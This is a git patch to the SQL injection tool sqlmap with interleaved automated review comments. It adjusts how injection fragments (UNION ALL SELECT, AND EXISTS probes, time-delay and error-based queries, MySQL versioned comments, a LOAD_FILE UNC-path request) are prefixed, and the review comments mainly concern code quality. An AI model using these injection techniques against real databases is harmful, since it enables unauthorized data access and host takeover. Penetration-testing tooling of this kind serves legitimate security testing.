From 215175e3b70c3715bfed36ec51dffc3ba27b99e8 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Mon, 25 Oct 2010 14:11:47 +0000
Subject: [PATCH] Minor code adjustments
---
 lib/core/agent.py | 2 +-
 lib/request/inject.py | 10 ++++++----
 lib/techniques/blind/inference.py | 4 ++--
 lib/techniques/blind/timebased.py | 2 +-
 lib/techniques/error/use.py | 12 +++++++-----
 lib/techniques/inband/union/test.py | 4 ++--
 lib/techniques/inband/union/use.py | 2 --
 plugins/dbms/access/fingerprint.py | 4 ++--
 plugins/dbms/maxdb/fingerprint.py | 6 +++---
 plugins/dbms/mysql/fingerprint.py | 4 ++--
 plugins/dbms/mysql/takeover.py | 2 +-
 plugins/generic/enumeration.py | 2 +-
 12 files changed, 28 insertions(+), 26 deletions(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 4f3d3e8c4..095e79d0e 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -446,7 +446,7 @@ class Agent:
 @rtype: C{str}
 """
- inbandQuery = self.prefixQuery(" UNION ALL SELECT ")
+ inbandQuery = self.prefixQuery("UNION ALL SELECT ")
 if query.startswith("TOP"):
 topNum = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)
diff --git a/lib/request/inject.py b/lib/request/inject.py
index f8faf0dac..63384c431 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -96,7 +96,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
 advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm.
 """
- query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].inference.query)
+
+ query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 count = None
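Review bot: The context line `topNum = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)` just below the changed one calls `.group(1)` on a match that may be None: `query.startswith("TOP")` is case-sensitive while the pattern is `re.I`, and nothing guarantees a count follows (`TOP` alone, or an identifier that merely starts with TOP), so the failure would surface as an AttributeError rather than a clear message. I would bind the match first, `m = re.search(r"\ATOP\s+([\d]+)\s+", query, re.I)`, and read `m.group(1)` only when `m` is not None, making the pattern a raw string while at it. Removing the leading space from `"UNION ALL SELECT "` (and from every other `prefixQuery` caller in this commit) assumes `prefixQuery` now inserts the separator itself; its definition is not in the diff, so that is worth confirming before merging. forgeInbandQuery starts and ends outside the hunk.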
@@ -394,12 +395,13 @@ def goStacked(expression, silent=False):
 if conf.direct:
 return direct(expression), None
- debugMsg = "query: %s" % expression
- logger.debug(debugMsg)
-
 comment = queries[kb.dbms].comment.query
 query = agent.prefixQuery("; %s" % expression)
 query = agent.postfixQuery("%s;%s" % (query, comment))
+
+ debugMsg = "query: %s" % query
+ logger.debug(debugMsg)
+
 payload = agent.payload(newValue=query)
 page, _ = Request.queryPage(payload, content=True, silent=silent)
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index bb97112a6..f340eac5f 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -441,7 +441,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 if commonValue is not None:
 # One-shot query containing equals commonValue
 testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
- query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
+ query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
 query = agent.postfixQuery(query)
 queriesCount[0] += 1
 result = Request.queryPage(urlencode(agent.payload(newValue=query)))
@@ -465,7 +465,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 # Substring-query containing equals commonPattern
 subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
 testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
- query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (subquery, testValue)))
+ query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
 query = agent.postfixQuery(query)
 queriesCount[0] += 1
 result = Request.queryPage(urlencode(agent.payload(newValue=query)))
diff --git a/lib/techniques/blind/timebased.py b/lib/techniques/blind/timebased.py
index b1013226f..0fa8cc245 100644
--- a/lib/techniques/blind/timebased.py
+++ b/lib/techniques/blind/timebased.py
@@ -24,7 +24,7 @@ def timeTest():
 logger.info(infoMsg)
 timeQuery = getDelayQuery(andCond=True)
- query = agent.prefixQuery(" AND %s" % timeQuery)
+ query = agent.prefixQuery("AND %s" % timeQuery)
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 start = time.time()
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index abe4c568a..54b8855ca 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -35,12 +35,12 @@ def errorUse(expression):
 Retrieve the output of a SQL query taking advantage of an error SQL injection vulnerability on the affected parameter.
 """
+ output = None
 logic = conf.logic
 randInt = randomInt(1)
- query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error.query)
+ query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
 query = agent.postfixQuery(query)
- payload = agent.payload(newValue=query)
 startLimiter = ""
 endLimiter = ""
@@ -62,11 +62,13 @@ def errorUse(expression):
 startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
 endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)
- debugMsg = "query: %s" % expressionUnescaped
+ forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
+
+ debugMsg = "query: %s" % forgedQuery
 logger.debug(debugMsg)
- forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
- result = Request.queryPage(urlencode(forgedPayload), content=True)
+ payload = agent.payload(newValue=forgedQuery)
+ result = Request.queryPage(urlencode(payload), content=True)
 match = re.search('%s(?P.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
 if match:
diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py
index fbcd80414..3620e9ce6 100644
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@@ -136,7 +136,7 @@ def __unionTestByNULLBruteforce(comment):
 """
 columns = None
- query = agent.prefixQuery(" UNION ALL SELECT NULL")
+ query = agent.prefixQuery("UNION ALL SELECT NULL")
 for count in range(0, 50):
 if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
@@ -164,7 +164,7 @@ def __unionTestByOrderBy(comment):
 prevPayload = ""
 for count in range(1, 51):
- query = agent.prefixQuery(" ORDER BY %d" % count)
+ query = agent.prefixQuery("ORDER BY %d" % count)
 orderByQuery = agent.postfixQuery(query, comment)
 payload = agent.payload(newValue=orderByQuery)
 seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py
index d9a8d3598..6066408f7 100644
--- a/lib/techniques/inband/union/use.py
+++ b/lib/techniques/inband/union/use.py
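Review bot: The context line `match = re.search('%s(?P…)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)` interpolates the two delimiter constants into the pattern unescaped, so if either ever holds a regex metacharacter the capture silently fails or spans the wrong text; wrapping them as `re.escape(ERROR_START_CHAR)` and `re.escape(ERROR_END_CHAR)` costs nothing and removes that coupling. The reordering in this hunk also means the forged query is now url-encoded as a whole via `urlencode(payload)` while the response is searched for the raw delimiter characters, which only works while the DBMS echoes them back verbatim — a one-line comment above `match = …` stating that assumption would help the next reader. errorUse continues outside the hunk.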
@@ -196,8 +196,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
 query = agent.forgeInbandQuery(expression, nullChar=nullChar)
 payload = agent.payload(newValue=query)
- # NOTE: for debug purposes only
- #debugMsg = "query: %s" % payload
 debugMsg = "query: %s" % query
 logger.debug(debugMsg)
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 9513a5598..300cb50f3 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -37,7 +37,7 @@ class Fingerprint(GenericFingerprint):
 elif kb.dbmsVersion[0] in ("2002-2003", "2007"):
 table = "MSysAccessStorage"
 if table:
- query = agent.prefixQuery(" AND EXISTS(SELECT CURDIR() FROM %s)" % table)
+ query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
@@ -67,7 +67,7 @@ class Fingerprint(GenericFingerprint):
 negate = True
 table = table[1:]
 randInt = randomInt()
- query = agent.prefixQuery(" AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table))
+ query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table))
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index beb550dc2..dcc94da05 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint):
 infoMsg = "executing SAP MaxDB SYSINFO version check"
 logger.info(infoMsg)
- query = agent.prefixQuery(" /* NoValue */")
+ query = agent.prefixQuery("/* NoValue */")
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
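Review bot: In the second access/fingerprint.py hunk the forged predicate `"AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s"` carries a trailing `FROM %s` outside the EXISTS subquery, which is not a valid continuation of a WHERE clause in general SQL; if it is deliberate for how Access parses the injected tail, a comment such as `# trailing FROM is intentional for Access` above the line would spare the next reader the same doubt, and if not, `"AND EXISTS(SELECT * FROM %s WHERE %d=%d)"` is the expected form. The `negate = True` / `table = table[1:]` lines just above also deserve a one-line comment naming which marker character is being stripped from the table name. The enclosing method starts outside the hunk.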
@@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint):
 minor, major = None, None
 for version in [6, 7]:
- query = agent.prefixQuery(" AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
+ query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
@@ -56,7 +56,7 @@ class Fingerprint(GenericFingerprint):
 major = version
 for version in xrange(0, 10):
- query = agent.prefixQuery(" AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
+ query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index 45d4cdc30..b95b7ebd5 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint):
 infoMsg = "executing MySQL comment injection fingerprint"
 logger.info(infoMsg)
- query = agent.prefixQuery(" /* NoValue */")
+ query = agent.prefixQuery("/* NoValue */")
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
 for version in range(element[0], element[1] + 1):
 randInt = randomInt()
 version = getUnicode(version)
- query = agent.prefixQuery(" /*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
+ query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index bd4d80d60..535dea898 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -101,7 +101,7 @@ class Takeover(GenericTakeover):
 def uncPathRequest(self):
 if not kb.stackedTest:
- query = agent.prefixQuery(" AND LOAD_FILE('%s')" % self.uncPath)
+ query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
 query = agent.postfixQuery(query)
 payload = agent.payload(newValue=query)
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 5e644bd80..3fa56e62a 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -815,7 +815,7 @@ class Enumeration:
 length = len(tables)
 for table in tables:
- query = agent.prefixQuery(" %s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))
+ query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))
 query = agent.postfixQuery(query)
 result = Request.queryPage(urlencode(agent.payload(newValue=query)))
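Review bot: The new line `query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)` splices `self.uncPath` into a quoted SQL literal with no escaping; the path is presumably generated by sqlmap itself, so this is not an injection concern, but a value containing `'` or a backslash would break the query instead of failing cleanly, and the `safeStringFormat` / unescaper helpers used by the inference.py and error/use.py hunks of this same commit would handle it uniformly. uncPathRequest continues outside the hunk.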
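Review bot: With the leading space removed, the `"%s" % safeStringFormat(…)` wrapper on the new line of the enumeration.py hunk is a no-op; `query = agent.prefixQuery(safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))` reads the same as the other call sites in this commit, for instance the two inference.py hunks. The enclosing method starts outside the hunk.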